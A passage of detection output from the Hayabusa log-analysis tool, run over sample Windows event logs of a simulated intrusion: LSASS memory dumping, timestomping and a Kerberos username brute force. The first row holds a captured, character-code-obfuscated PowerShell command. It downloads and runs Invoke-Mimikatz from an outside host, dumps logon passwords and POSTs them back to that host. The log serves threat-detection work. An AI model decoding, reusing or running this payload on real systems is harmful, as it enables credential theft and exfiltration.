100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 
117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 
111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x90c | User: admmig | LID: 0x8157bac",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.651 +00:00,fs03vuln.offsec.lan,4688,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,rules/sigma/process_creation_builtin/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.651 +00:00,fs03vuln.offsec.lan,4688,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation_builtin/proc_creation_win_set_policies_to_unsecure_level.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.651 +00:00,fs03vuln.offsec.lan,4688,low,Exec,Non 
Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.651 +00:00,fs03vuln.offsec.lan,4688,high,Exec,Suspicious PowerShell Parameter Substring,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_suspicious_parameter_variation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.651 +00:00,fs03vuln.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:45.843 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x214 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-24 15:48:24.985 +00:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx +2021-11-24 15:48:25.000 +00:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx +2021-11-27 15:47:00.365 +00:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx +2021-11-27 15:47:00.369 +00:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx +2021-11-30 22:05:47.229 +00:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\287ded39f444f2847a5175b4bf51f9c9\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=4F4193BFF5970968B6EEAD58EB83F9415F32A5C1,MD5=9139657B434F2FA8023775958164DB0C,SHA256=EE9CD13CC38A285D48B00E21CBB11F9CA8C8F435ADF6ADF5281C371DD0A406AA,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:50.065 +00:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: 
SHA1=1663A59FF35A01F612C878AB83F2AD242BB46FB6,MD5=FC2036AB90490D8FDFB3B3F3B90AF56F,SHA256=E293B79E4C06E8DEFD95F3CB9B70BA1CC50E83C37930DA802B50066AC6DF0509,IMPHASH=77B4BD4D7F94DBB1235EEE9E8C0737DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:50.065 +00:00,fs03vuln.offsec.lan,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/image_load_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:50.864 +00:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62095 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:50.864 +00:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:59.943 +00:00,fs03vuln.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 2668 | Src PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Tgt PID: 480 | Tgt PGUID: 
A57649D1-92D8-61A4-7191-000000000000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:59.943 +00:00,fs03vuln.offsec.lan,10,high,CredAccess,LSASS Memory Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:59.943 +00:00,fs03vuln.offsec.lan,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:59.943 +00:00,fs03vuln.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/proc_access_win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:59.943 +00:00,fs03vuln.offsec.lan,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/proc_access_win_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:06:02.033 +00:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62096 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: 
A57649D1-A03B-61A6-2F23-8D0000000000",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:06:02.033 +00:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-02 14:48:15.983 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test1 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:15.983 +00:00,-,-,medium,InitAccess : PrivEsc,Invalid Users Failing To Authenticate From Source Using Kerberos,"[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:46 TargetUserName:g/go/ugu/vrat/admtest/uydzry/ytuntsr/mgdi/ar/dyfgdhbn/b aer/xt/yvas/bdcy/xc/ryver/s/vt/vay/vs/tfay/wyt/rec/nini/syvsdy/bsfin/tc/gsdf/vase/test2/yvsyv/sef/sfs/tary/ysy/accrt/rey/sgfg/srey/test1/m,og/nd/vga/tbyt/vdr/xvtrz IpAddress:::ffff:10.23.123.11 timeframe:24h",rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos3.yml,- +2021-12-02 14:48:16.298 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:16.308 
+00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test2 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:16.311 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admtest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:16.338 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:16.338 +00:00,-,-,medium,InitAccess : PrivEsc,Disabled Users Failing To Authenticate From Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:16 TargetUserName:SM_25e3b4425ffd47aab/SM_b2a35e76f50a4c23a/SM_957258b5879242afb/SM_6aaeeb113c0c4af3a/$P51000-50I28MP5JB3E/administrator/krbtgt/SM_2b6f1a51ac6c41b2a/SM_27d255b6407743b08/Guest/Administrator/SM_2f6964c8f421408ab/SM_8b9faa99d83446d1b/Test-ADM/SM_374806bcc65140a5a/DefaultAccount IpAddress:::ffff:10.23.123.11 timeframe:24h,rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos2.yml,- +2021-12-02 14:48:16.342 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | 
Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:16.956 +00:00,-,-,medium,InitAccess : PrivEsc,Valid Users Failing to Authenticate From Single Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:22 TargetUserName:HealthMailboxa99e1bd/svc-ata/admin-te/HealthMailboxdabf0a3/HealthMailboxe8b0d98/HealthMailbox0ab31b3/adminupn42/HealthMailbox2cfa5bd/HealthMailboxf49e2c8/HealthMailboxa935ecd/vuln_scan/HealthMailboxf7e4358/admin-hacker/domadm/HealthMailboxebdc745/HealthMailboxc9291f7/svc_adfs01/HealthMailbox9a2d0da/Svc-SQL-DB01/svc_nxlog/HealthMailboxeb3dc3f/proabcdef IpAddress:::ffff:10.23.123.11 timeframe:24h,rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos.yml,- +2021-12-02 14:48:17.267 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sgfg | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.271 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: g | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.274 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dyfgdhbn | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: 
-,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.277 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xvtrz | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.281 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ar | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.284 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tary | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.287 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bsfin | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.319 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: mgdi | Svc: krbtgt/OFFSEC.LAN | IP Addr: 
::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.323 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vdr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.327 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.331 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: syvsdy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.334 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: s | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.337 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: 
ysy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.341 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vrat | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.344 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.348 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.351 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: uydzry | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.354 
